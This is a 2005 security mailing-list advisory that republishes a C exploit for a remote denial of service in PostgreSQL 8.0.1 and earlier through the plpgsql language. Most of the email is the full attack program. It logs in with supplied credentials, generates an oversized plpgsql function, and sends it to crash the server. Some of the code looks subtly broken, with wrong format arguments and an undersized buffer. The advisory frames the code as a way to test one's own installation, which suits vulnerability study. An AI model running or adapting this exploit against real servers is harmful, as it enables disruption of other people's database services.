From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 19 Apr 2005 20:41:02 +0200
Subject: [EXPL] PostgreSQL Remote DoS (plpgsql)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050419175219.CE9DB573A@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PostgreSQL Remote DoS (plpgsql)
------------------------------------------------------------------------
SUMMARY
A vulnerability in PostgreSQL server allows remote attackers to cause the
server to reboot if it has been enabled to support the plpgsql language.
The following exploit code can be used to test your PostgreSQL server
installation.
DETAILS
Vulnerable Systems:
* PostgreSQL version 8.01 and prior
Exploit:
/* PostgreSQL Remote Reboot <=8.01
* writen by ChoiX [[email protected]]
* (c) Unl0ck Research Team [www.unl0ck.org]
* info: Server can be rebooted only if plpgsql language is switched on.
* To compilate exploit you should have "libpq" library on your box
* and use command $ cc -o pgsql_reboot pgsql_reboot.c
-I/usr/local/pgsql/include -L/usr/local/pgsql/lib -lpq
* Root exploits will be released later, coz now it's very dangerous to
release it.
* greets to:
* unl0ck members: DarkEagle, crash-x, nekd0, xtix, [0xdeadbabe]
* m00 members: ov3r
*/
#include <stdio.h>
#include <getopt.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <libpq-fe.h>
#define DEFAULT_PORT "5321"
#define DEFAULT_DB "postgresql"
#define FUNC_NAME "uKt_test"
#define TABLE_NAME "unl0ck_table"
char str[4000];
char create[]="CREATE OR REPLACE FUNCTION %s RETURNS integer AS $$\n";
char declare[] = "DECLARE\n";
char com[] = "\t--%\n";
char varible_REC[] = "\trec RECORD;\n";
char varible_var[] = "\tvar%d varchar := \'BBBB\';\n";
char begin[] = "BEGIN\n";
char select_1[] = "SELECT INTO rec FROM %s WHERE\n";
char select_2[] = "var%d = AAAA AND\n";
char select_3[] = "var1029 = AAAA;\n";
char end[] = "END\n";
char finish[] = "$$ LANGUAGE plpgsql\n";
void usage(char *name){
printf("PostgreSQL Remote DoS <=8.0.1\n");
printf("writen by ChoiX [[email protected]]\n");
printf("(c) Unl0ck Research Team [[email protected]]\n");
printf("Usage: %s -H <host_address> [-P <port>] -u <user_name> -p
<password> [-d <database_name>] \n", name);
printf("Default port = %s\nDefault dbname = %s\n", DEFAULT_PORT,
DEFAULT_DB);
exit(0);
}
int make_str();
int main(int argc, char *argv[]){
char opt;
char *host = NULL, *port = NULL, *user = NULL, *password = NULL, *dbname =
NULL;
struct hostent *he;
PGconn *conn;
PGresult *res;
while((opt = getopt(argc, argv, "H:P:u:p:d:")) != EOF){
switch(opt){
case 'H':
host = optarg;
break;
case 'P':
port = optarg;
break;
case 'u':
user = optarg;
break;
case 'p':
password = optarg;
break;
case 'd':
dbname = optarg;
break;
default:
usage(argv[0]);
break;
}
}
if(host == NULL) usage(argv[0]);
if(user == NULL) usage(argv[0]);
if(password == NULL) usage(argv[0]);
if(port == NULL) port = DEFAULT_PORT;
if(dbname == NULL) dbname = DEFAULT_DB;
printf("\tPostgreSQL Remote DoS <=8.0.1\n");
printf("[*] Host/Port: %s/%s\n", host, port);
printf("[*] DBname/User/Password: %s/%s/%s\n", dbname, user, password);
conn = PQsetdbLogin(host, port, NULL, NULL, dbname, user, password);
if(PQstatus(conn) == CONNECTION_BAD){
PQfinish(conn);
printf("[-] Cannot connect to the database\n");
exit(1);
}
printf("[+] Connected to the database\n");
make_str();
printf("[+] Command has been generated\n");
res = PQexec(conn, str);
if (PQresultStatus(res) == PGRES_TUPLES_OK){
printf("[+] Command has been sent\n");
}
if(PQstatus(conn) == CONNECTION_BAD){
printf("[+] Server has been rebooted\n");
exit(0);
} else {
printf("[-] Server hasnt been rebooted\n");
exit(0);
}
}
int make_str(){
char temp[100];
int i;
int len = sizeof(temp) -1;
//write char create[]
snprintf(temp, len, create, FUNC_NAME);
strcpy(str,temp);
//write char declare[]
snprintf(temp, len, begin);
strcat(str, temp);
//write char varible_REC[]
snprintf(temp, len, varible_REC);
strcat(str, temp);
//write char varible_var[]
for(i = 0;i < 1029;i++){
snprintf(temp, len, varible_var, i);
strcat(str, temp);
}
//write char begin[]
snprintf(temp, len, begin);
strcat(str, temp);
//write char select_1[]
snprintf(temp, len, select_1, TABLE_NAME);
strcat(str, temp);
//write char select_2[]
for(i = 0;i < 1028;i++){
snprintf(temp, len, select_2, i);
strcat(str, temp);
}
//write char select_3[]
snprintf(temp, len, select_3);
strcat(str, temp);
//write char end[]
snprintf(temp, len, temp);
strcat(str, temp);
//write char finish[]
snprintf(temp, len, finish);
strcat(str,temp);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:choix@unl0ck.org.> ChoiX.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
